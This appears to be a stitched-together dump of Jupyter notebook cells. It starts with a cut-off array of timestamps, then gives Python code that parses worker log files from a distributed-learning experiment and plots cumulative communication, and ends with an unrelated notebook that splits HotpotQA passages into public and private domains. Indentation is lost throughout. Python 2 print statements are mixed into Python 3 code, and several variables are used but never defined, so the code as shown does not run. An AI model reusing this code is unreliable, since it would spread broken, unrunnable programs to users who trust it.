1539344530.377, 1539344536.567, 1539344542.774, 1539344549.003, 1539344555.249, 1539344561.492, 1539344567.593, 1539344573.742, 1539344580.02, 1539344586.047, 1539344592.341, 1539344598.466, 1539344604.658, 1539344610.763, 1539344616.883, 1539344622.999, 1539344629.085, 1539344635.245, 1539344641.447, 1539344647.471, 1539344653.756, 1539344659.806, 1539344666.051, 1539344672.142, 1539344678.282, 1539344684.308, 1539344690.537, 1539344696.797, 1539344703.116, 1539344709.736, 1539344716.096, 1539344722.665, 1539344729.096], [1539343806.652, 1539343812.925, 1539343819.572, 1539343825.816, 1539343832.508, 1539343838.715, 1539343844.966, 1539343851.247, 1539343858.548, 1539343864.379, 1539343870.749, 1539343877.165, 1539343883.429, 1539343889.468, 1539343896.74, 1539343902.85, 1539343908.945, 1539343915.216, 1539343921.473, 1539343927.597, 1539343933.736, 1539343941.012, 1539343946.794, 1539343952.691, 1539343958.936, 1539343965.406, 1539343971.728, 1539343977.927, 1539343984.098, 1539343990.571, 1539343996.999, 1539344003.293, 1539344009.598, 1539344028.389, 1539344029.436, 1539344030.462, 1539344036.056, 1539344042.289, 1539344048.457, 1539344054.568, 1539344060.934, 1539344067.16, 1539344073.367, 1539344079.658, 1539344086.162, 1539344092.574, 1539344098.7, 1539344104.707, 1539344110.926, 1539344117.048, 1539344123.166, 1539344129.501, 1539344135.77, 1539344142.034, 1539344148.356, 1539344154.707, 1539344160.798, 1539344166.774, 1539344172.993, 1539344179.126, 1539344185.378, 1539344191.482, 1539344197.642, 1539344203.9, 1539344210.317, 1539344216.777, 1539344222.842, 1539344229.191, 1539344235.627, 1539344242.129, 1539344248.443, 1539344254.819, 1539344260.926, 1539344266.979, 1539344272.995, 1539344279.166, 1539344285.497, 1539344291.759, 1539344298.02, 1539344304.235, 1539344310.294, 1539344316.345, 1539344322.554, 1539344328.802, 1539344335.031, 1539344341.3, 1539344347.38, 1539344353.634, 1539344359.995, 1539344366.242, 1539344372.598, 1539344378.836, 1539344385.118, 1539344391.38, 1539344397.669, 1539344404.066, 1539344410.225, 1539344416.176, 1539344422.21, 1539344428.357, 1539344434.522, 1539344440.548, 1539344446.391, 1539344452.471, 1539344458.54, 1539344464.923, 1539344471.291, 1539344477.435, 1539344483.608, 1539344490.024, 1539344496.273, 1539344502.626, 1539344509.011, 1539344515.418, 1539344521.522, 1539344527.88, 1539344534.039, 1539344540.393, 1539344546.724, 1539344553.07, 1539344559.493, 1539344565.893, 1539344572.244, 1539344578.515, 1539344584.661, 1539344591.042, 1539344597.115, 1539344603.136, 1539344609.2, 1539344615.479, 1539344621.769, 1539344627.925, 1539344634.231, 1539344640.505, 1539344646.715, 1539344653.187, 1539344659.418, 1539344665.656, 1539344671.942, 1539344678.078, 1539344684.431, 1539344690.792, 1539344697.184, 1539344703.567, 1539344710.123, 1539344716.594, 1539344722.998, 1539344729.236]]
```
# Somehow changed
```
files = []
losses = []
timestamps = []
for i in range(nodesAmount):
files.append(open(os.path.join(experimentFolder, "worker" + str(i), "losses.txt"), "r"))
losses.append([])
timestamps.append([])
t = [0]
commonStep = 0
displayStep = 5
recordStep = 1
recordUnique = True
#print(f"message_sizes after registration {message_sizes}")
# buffer for violation messages (lines get read but might not be relevant for that sync round; so we have to remember them for the next time)
vlines_buffer = []
rlines_buffer = []
slines_buffer = []
message_size = 0
message_sizes = []
#figs = []
while 1:
for i in range(nodesAmount):
file = files[i]
where = file.tell()
line = file.readline()
if not line:
time.sleep(1)
file.seek(where)
else:
losses[i].append(float(line[:-1].split('\t')[1])) #could append sth else or take a counter
timestamps[i].append(float(line.split('\t')[0]))
currentStep = min([len(l) for l in losses])
# now need to know which worker is responsible for the minimum and take time stamp of this
worker_ind = np.argmin([len(l) for l in losses])
#now take time stamp of this worker
#for i in range(nodesAmount):
#file = worker0_losses
sync_file = files[worker_ind]
where = sync_file.tell()
line = sync_file.readline()
if not line:
time.sleep(1)
sync_file.seek(where)
else:
losses.append(float(line[:-1].split('\t')[1])) # unnecessary here but just leave it for the moment to ensure running of the code below
time_step = float(line.split('\t')[0])
# get data of registration and violation files up to this time step
#print("TIME STEP:" + str(time_step))
#check for registrations up to time_step
while True: #unnecessary overhead, but just copied. Could restrict it to number of learners etc.
# check in buffer (if not empty)
if rlines_buffer != []:
for rline in rlines_buffer:
if float(rline[0].split("\t")[0]) < time_step:
message_size = message_size + int(rline[0].split("\t")[4])
#print("registration message from buffer added with ts " + str(float(rline[0].split("\t")[0])))
#print("message_size: " + str(message_size))
# delete message from buffer
rlines_buffer.remove(rline)
# read new lines
where = data_registrations.tell()
rline = data_registrations.readline()
if not rline: #could it be that I'M waiting here too long?
#time.sleep(1)
data_registrations.seek(where)
break
else:
if float(rline.split("\t")[0]) < time_step:
# here: index 4 = message size
message_size = message_size + int(rline.split("\t")[4])
#print("registration message added with ts " + str(float(rline.split("\t")[0])))
#print("message_size: " + str(message_size))
else:
rlines_buffer.append([rline])
break
#check for sendModels up to time_step
while True:
# check in buffer (if not empty)
if slines_buffer != []:
for sline in slines_buffer:
if float(sline[0].split("\t")[0]) < time_step:
# count number of points in this string which coincides with the number of nodes receiving the model
message_size= message_size + int(sline[0].split("\t")[3])* sline[0].split("\t")[2].count(".")
#print("sendModel message from buffer added with ts " + str(float(sline[0].split("\t")[0])))
#print("message_size: " + str(message_size))
# delete message from buffer
slines_buffer.remove(sline)
# read new lines
where = data_sendModel.tell()
sline = data_sendModel.readline()
if not sline: #could it be that I'M waiting here too long?
#time.sleep(1)
data_sendModel.seek(where)
break
else:
if float(sline.split("\t")[0]) < time_step:
# here: index 4 = message size
# count number of points in this string which coincides with the number of nodes receiving the model
message_size= message_size + int(sline.split("\t")[3])* sline.split("\t")[2].count(".")
#print("sendModel message added with ts " + str(float(sline.split("\t")[0])))
#print("message_size: " + str(message_size))
else:
slines_buffer.append([sline])
break
#check for violations up to time_step
while True:
# check in buffer (if not empty)
if vlines_buffer != []:
for vline in vlines_buffer:
if float(vline[0].split("\t")[0]) < time_step:
message_size = message_size + int(vline[0].split("\t")[4])
#print("violation message from buffer added with ts " + str(float(vline[0].split("\t")[0])))
#print("message_size: " + str(message_size))
# delete message from buffer
vlines_buffer.remove(vline)
# read new lines
where = data_violations.tell()
vline = data_violations.readline()
if not vline: #could it be that I'M waiting here too long?
#time.sleep(1)
data_violations.seek(where)
break
else:
if float(vline.split("\t")[0]) < time_step:
# here: index 4 = message size
message_size = message_size + int(vline.split("\t")[4])
#print("violation message added with ts " + str(float(vline.split("\t")[0])))
#print("message_size: " + str(message_size))
else:
vlines_buffer.append([vline])
break
message_sizes.append(message_size)
#print("message_sizes: " + str(message_sizes))
#currentStep = min([len(l) for l in losses])
#currentStep = len(losses)
if currentStep > commonStep:
commonStep = currentStep
if commonStep % displayStep == 0:
clear_output(wait=True)
#cutLosses = [l[:commonStep] for l in losses]
#figs = []
#for i in range(nodesAmount):
#figs.append(plt.figure())
plt.figure()
#plt.plot(t, cutLosses[i], lw=2, label='loss learner ' + str(i), color='red')
plt.plot(t, message_sizes, lw=2, label='cumulative communication', color='blue')
plt.legend(loc='upper center')
plt.grid()
plt.show()
t.append(t[-1] + 1)
if len(t) % recordStep == 0 and t != 0:
j = 0
#for fig in figs:
if recordUnique:
#fig.savefig(os.path.join(experimentFolder, 'loss_learner' + str(j) + '_' + str(len(t)) + '.png'), dpi=100)
fig.savefig(os.path.join(experimentFolder, 'cumulative_communication' + str(len(t)) + '.png'), dpi=100)
else:
#fig.savefig(os.path.join(experimentFolder, 'loss_learner' + str(j) + '.png'), dpi=100)
fig.savefig(os.path.join(experimentFolder, 'cumulative_communication.png'), dpi=100)
j += 1
```
# OLD
```
# registration messages sizes
displayStep = 1
recordStep = 1
recordUnique = True
reg_msizes = []
line = data_registrations.readline()
while line != "":
# here: index 4 = message size
reg_msizes.append(int(line.split("\t")[4]))
line = data_registrations.readline()
# initial value of message_sizes = sum of registration message sizes
message_size = sum(reg_msizes)
message_sizes = []
message_sizes.append(message_size)
#print(f"message_sizes after registration {message_sizes}")
# buffer for violation messages (lines get read but might not be relevant for that sync round; so we have to remember them for the next time)
vlines_buffer = []
sync_round = 0
sync_rounds = []
sync_rounds.append(sync_round)
count = 0
while True:
#print(f"message_sizes beginning first loop {message_sizes}")
where = data_sendModel.tell()
line = data_sendModel.readline()
if not line:
time.sleep(1)
data_sendModel.seek(where)
else:
sync_round = sync_round + 1
sync_rounds.append(sync_round)
# index 0 = time stamp
sync_time = float(line.split("\t")[0])
# here: index 3 = message size, index 2 = topic which contains nodes that the model is sent to
# count number of points in this string which coincides with the number of nodes receiving the model
message_size= message_size + int(line.split("\t")[3])* line.split("\t")[2].count(".")
#print(f"message_sizes after sync {message_sizes}")
# now check for violation messages up to sync time
while True:
# check in buffer (if not empty)
if vlines_buffer != []:
for vline in vlines_buffer:
if float(vline[0].split("\t")[0]) < sync_time:
message_size = message_size + int(vline[0].split("\t")[4])
# delete message from buffer
vlines_buffer.remove(vline)
# read new lines
where = data_violations.tell()
vline = data_violations.readline()
if not vline:
time.sleep(1)
data_violations.seek(where)
else:
if float(vline.split("\t")[0]) < sync_time:
# if violation message was before synchronizing, add size of this message
# here: index 4 = message size
message_size = message_size + int(vline.split("\t")[4])
else:
vlines_buffer.append([vline])
break
message_sizes.append(message_size)
if sync_round % displayStep == 0:
clear_output(wait=True)
fig = plt.figure()
plt.plot(sync_rounds, message_sizes, label='cumulative communication', color='blue')
plt.legend(loc='upper left')
plt.grid()
plt.show()
if sync_round % recordStep == 0:
if recordUnique:
fig.savefig(os.path.join(experimentFolder, 'cumulative_communication' + str(sync_round) + '.png'), dpi=100)
else:
fig.savefig(os.path.join(experimentFolder, 'cumulative_communication.png'), dpi=100)
for file in files:
file.close()
#####CHANGED: / in front of files
def readExpParams(folder):
fileName = folder + "/summary.txt"
result = {}
f = open(fileName, 'r')
lines = f.readlines()
for line in lines:
if "Learner:" in line:
for val in line.replace("Learner:", "").split(","):
if "batchSize" in val:
result["batchSize"] = int(val.split("=")[1].strip())
return result
def readCoordRegistration(folder):
fileName = folder + "/coordinator/communication/registrations.txt"
result = []
f = open(fileName, 'r')
lines = f.readlines()
for line in lines:
vals = line.split("\t")
time = float(vals[0])#datetime.fromtimestamp(float(vals[0]))
origin = int(vals[3])
result.append([time, origin])
return result
def readWorkerRegistration(folder, worker):
fileName = folder + "/worker"+str(worker)+"/communication/registrations.txt"
result = []
f = open(fileName, 'r')
lines = f.readlines()
for line in lines:
vals = line.split("\t")
time = float(vals[0])#datetime.fromtimestamp(float(vals[0]))
origin = int(vals[3])
result.append([time, origin])
return result
def readCoordModel(folder):
fileName = folder + "/coordinator/communication/send_model.txt"
result = []
f = open(fileName, 'r')
lines = f.readlines()
for line in lines:
vals = line.split("\t")
time = float(vals[0])#datetime.fromtimestamp(float(vals[0]))
destinations = vals[2].replace("newModel.","").split(".")
for d in destinations:
result.append([time, int(d)])
return result
def readWorkerModel(folder, worker):
fileName = folder + "/worker"+str(worker)+"/communication/send_model.txt"
result = []
f = open(fileName, 'r')
lines = f.readlines()
for line in lines:
vals = line.split("\t")
time = float(vals[0])#datetime.fromtimestamp(float(vals[0]))
modelVersion = vals[2]
result.append([time, modelVersion])
return result
def readCoordViolations(folder):
fileName = folder + "/coordinator/communication/violations.txt"
result = []
f = open(fileName, 'r')
lines = f.readlines()
for line in lines:
vals = line.split("\t")
time = float(vals[0])#datetime.fromtimestamp(float(vals[0]))
origin = int(vals[3])
result.append([time, origin])
return result
def readWorkerViolations(folder, worker):
fileName = folder + "/worker"+str(worker)+"/communication/violations.txt"
result = []
f = open(fileName, 'r')
lines = f.readlines()
for line in lines:
vals = line.split("\t")
time = float(vals[0])#datetime.fromtimestamp(float(vals[0]))
result.append([time])
return result
def readWorkerLosses(folder, worker):
fileName = folder + "/worker"+str(worker)+"/losses.txt"
result = []
f = open(fileName, 'r')
lines = f.readlines()
for line in lines:
vals = line.split("\t")
time = float(vals[0])#datetime.fromtimestamp(float(vals[0]))
result.append([time])
return result
class TimeToFrame():
def __init__(self, batchSize, losses, registrations, framesPerExample): #for a proper maxTimestamp we would need the kill messages
self.batchSize = batchSize
self.lossTimestamps = sorted([l[0] for l in losses])
self.regTimestamps = sorted([r[0] for r in registrations])
self.framesPerExample = framesPerExample
self.minTimestamp = min([min(self.lossTimestamps),min(self.regTimestamps)])
self.maxTimestamp = max([max(self.lossTimestamps),max(self.regTimestamps)])
self.lastFrame = len(losses) * batchSize * framesPerExample
print("minTS: ", self.minTimestamp)
print("maxTS: ", self.maxTimestamp)
def convertTimestampsToFrames(self, messages):
newMessages = []
for m in messages:
ts = m[0]
new_m = m
new_m[0] = self._tsToFr(ts)
if not new_m[0] > self.lastFrame:#ignore messages after the last training was logged
newMessages.append(new_m)
return newMessages
def _tsToFr(self, ts):
framesPerBatch = self.batchSize*self.framesPerExample
frame = 0
#print ts
#print framesPerBatch,"\n***"
for i in range(len(self.lossTimestamps)):
l = self.lossTimestamps[i]
#print "l: ",l
#print "frame: ",frame
if ts > l:
frame += framesPerBatch
elif ts <= l and i > 0:
high = l
low = self.lossTimestamps[i-1]
pos = int((float(ts - low) /float(high - low))*framesPerBatch)
#print "i: ",i," high: ",high," low: ",low, "ts: ", ts
#print "pos: ",pos, "frame: ",frame
frame += pos
return frame
else:
high = l
low = self.minTimestamp
pos = int((float(ts - low) /float(high - low))*framesPerBatch)
#print "end:"
#print "i: ",i," high: ",high," low: ",low, "ts: ", ts
#print "pos: ",pos, "frame: ",frame
frame += pos
return frame
#print "len losses",len(self.lossTimestamps)
#print "ts: ",ts," frame: ", frame," i: ",i
return self.lastFrame + 1
expParams = readExpParams(experimentFolder)
batchSize = expParams["batchSize"]
framesPerExample = 5
coordRegistration = readCoordRegistration(experimentFolder)
worker0Registration = readWorkerRegistration(experimentFolder, 0)
coordModel = readCoordModel(experimentFolder)
worker0Model = readWorkerModel(experimentFolder, 0) #these are just the "receives"
coordViolations = readCoordViolations(experimentFolder)
worker0Violations = readWorkerViolations(experimentFolder, 0)
worker0Losses = readWorkerLosses(experimentFolder, 0)
#In the following, I'm going to align the coordinator time with that of worker0
#workerViolations = [worker0Violations,worker1Violations,worker2Violations,worker3Violations]
#workerModels = [worker0Model,worker1Model,worker2Model,worker3Model]
#workerRegistrations = [worker0Registration,worker1Registration,worker2Registration,worker3Registration]
#workerLosses = [woker0Losses,woker1Losses,woker2Losses,woker3Losses]
Tcoord = TimeToFrame(batchSize, worker0Losses, worker0Registration, framesPerExample)
print("aligning violations")
cviol = Tcoord.convertTimestampsToFrames(coordViolations)
violations = [] #containing send_frame, sender, receive_frame, receiver, type
#for i in range(len(workerViolations)):
# print("worker ",i)
T = TimeToFrame(batchSize, worker0Losses, worker0Registration, framesPerExample)
wviol = T.convertTimestampsToFrames(worker0Violations)
cviolW = [c for c in cviol if c[1] == 0] #only the violations received from worker i
if len(wviol) != len(cviolW):
print("WFT!?! len model messages = ",len(wviol)," len coord messages = ", len(cviolW))
coordPos = 0
for j in range(len(wviol)):
send_frame = wviol[j][0]
sender = "worker" + str(0)
receive_frame = cviolW[coordPos]
if len(receive_frame)>1:
receive_frame = receive_frame[0]
while (receive_frame < send_frame):
coordPos += 1
receive_frame = cviolW[coordPos]
if len(receive_frame)>1:
receive_frame = receive_frame[0]
violations.append([send_frame, sender, receive_frame, "coordinator", "violation"])
#print violations
print "aligning send_model messages:"
print "lastFrame: ",Tcoord.lastFrame
cmodel = Tcoord.convertTimestampsToFrames(coordModel)
sendModels = [] #containing send_frame, sender, receive_frame, receiver, type
for i in range(len(workerModels)):
print "worker ",i
T = TimeToFrame(batchSize, workerLosses[i], workerRegistrations[i], framesPerExample)
wmodel = T.convertTimestampsToFrames(workerModels[i])
cmodelW = [c for c in cmodel if c[1] == i] #only the models send to worker i
if len(wmodel) != len(cmodelW):
print "WFT!?! len model messages = ",len(wmodel)," len coord messages = ", len(cmodelW)
workerPos = 0
for j in range(len(cmodelW)):
if not workerPos < len(wmodel):
break
send_frame = cmodelW[j][0]
sender = "coordinator"
receive_frame = wmodel[workerPos][0]
reveiver = "worker" + str(i)
while (receive_frame < send_frame):
workerPos += 1
if workerPos >= len(wmodel):
receive_frame = Tcoord.lastFrame
#print "WFT... receive frame: ",receive_frame
break
receive_frame = wmodel[workerPos][0]
#print [send_frame, sender, receive_frame, reveiver, "sendModel"], " workerPos: ",workerPos
sendModels.append([send_frame, sender, receive_frame, reveiver, "sendModel"])
```
| github_jupyter |
```
%load_ext autoreload
%autoreload 2
import csv
import ujson, os
import json
from tqdm import tqdm
import os.path
import pandas as pd
import time
from collections import Counter, defaultdict, OrderedDict
import random
import ast
prefix = "concurrentqa/" # FILL IN PATH TO REPOSITORY
```
# Load original data
```
st = time.time()
passages_path = f'{prefix}/datasets/hotpotqa/hotpot_index/wiki_id2doc.json'
with open(passages_path) as f:
wiki_id2doc = json.load(f)
passages = []
for k, v in wiki_id2doc.items():
v['id'] = k
passages.append(v)
print(f"Loaded full set of documents in {time.time() - st}")
st = time.time()
st = time.time()
df = pd.DataFrame(passages)
print(f"Loaded full set of documents in {time.time() - st}")
st = time.time()
df.head(1)
alldomaintitles = []
title2sent_map = {}
count = 0
for k, v in tqdm(wiki_id2doc.items()):
title = v['title']
sents = v['text']
sents = sents.split(". ")
alldomaintitles.append(title)
title2sent_map[title] = sents
print(len(title2sent_map))
with open(f'{prefix}/datasets/hotpotqa/hotpot/hotpot_qas_val.json') as f:
qa_entries = []
for line in f:
entry = ast.literal_eval(line)
qa_entries.append(entry)
print(f"QAs set has {len(qa_entries)} data points.")
```
### The following generates new private/public data splits and prepares everything for running retrieval on HotpotQA Dev Data
```
def process_item(item, domain=-1):
item['domain'] = domain
return item
def get_domain_splits(private_prop, alldomaintitles):
title2domain = {}
domain1titles = []
domain2titles = []
random.seed(0)
# splits by title randomly
for title in tqdm(alldomaintitles):
randnum = random.random()
if randnum > private_prop:
title2domain[title] = 0
domain1titles.append(title)
else:
title2domain[title] = 1
domain2titles.append(title)
return title2domain, domain1titles, domain2titles
# we will do this for private splits of different sizes; private_prop 0.5 means equal 50-50 public-private splits
for private_prop in [0.5]:
# path where you will save the generated data
path = f"{prefix}/datasets/hotpotqa_pair/hotpot_privateprop_{private_prop}/"
if not os.path.exists(path):
os.makedirs(path)
title2domain, domain1titles, domain2titles = get_domain_splits(private_prop, alldomaintitles)
# Save the passages
print(f"Num domain 1 titles: {len(domain1titles)}")
print(f"Num domain 2 titles: {len(domain2titles)}\n")
if not os.path.exists(path):
print(f"Making dir at: {path}")
os.makedirs(path)
df['domain1'] = df['title'].apply(lambda x: title2domain[x]==0)
df['domain2'] = df['title'].apply(lambda x: title2domain[x]==1)
sub_df = df[df['domain1'] == True]
dic = sub_df.to_dict('index')
with open(f'{path}/domain0psgs.json', "w") as f:
json.dump(dic, f)
print("Saved domain 1 passages.")
sub_df = df[df['domain2'] == True]
dic = sub_df.to_dict('index')
with open(f'{path}/domain1psgs.json', "w") as f:
json.dump(dic, f)
print("Saved domain 2 passages.")
# determine private and public entities of those appearing in the queries
entity_df = pd.DataFrame(entitytitles.items(), columns=['entitytitle', 'domain'])
entity_df['domain'] = entity_df['entitytitle'].apply(lambda x: title2domain[x]==0)
entitytitle2domain_cache = {}
for ind, row in entity_df.iterrows():
entitytitle2domain_cache[row['entitytitle']] = row['domain']
# Save the questions
localquestions = []
globalquestions = []
not_in_corpus = 0
for idx, item in tqdm(enumerate(qa_entries)):
sps = item['sp']
domains = [entitytitle2domain_cache[sp['title']] for sp in sps]
domain1_exists = any(d == True for d in domains)
domain2_exists = any(d == False for d in domains)
neither_exists = not domain1_exists and not domain2_exists
if domain1_exists and not domain2_exists:
localquestions.append(process_item(item, domain=domains))
if not domain1_exists and domain2_exists:
globalquestions.append(process_item(item, domain=domains))
if neither_exists:
not_in_corpus += 1
print(f"There are: {len(localquestions)} local questions")
print(f"There are: {len(globalquestions)} global questions")
print(f"For {not_in_corpus} questions, could not find documents in corpus.")
if not os.path.exists(f'{path}/domain_0/'):
os.makedirs(f'{path}/domain_0/')
if not os.path.exists(f'{path}/domain_1/'):
os.makedirs(f'{path}/domain_1/')
with open(f'{path}/domain_0/hotpot_qas_val_domain0.json', 'w') as f:
for question in localquestions:
json.dump(question, f)
f.write("\n")
with open(f'{path}/domain_1/hotpot_qas_val_domain1.json', 'w') as f:
for question in globalquestions:
json.dump(question, f)
f.write("\n")
allquestions = localquestions.copy()
allquestions.extend(globalquestions.copy())
with open(f'{path}/hotpot_qas_val_all.json', 'w') as f:
for question in allquestions:
json.dump(question, f)
f.write("\n")
print(f"Saved data for private proportion {private_prop}.")
```
| github_jupyter |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.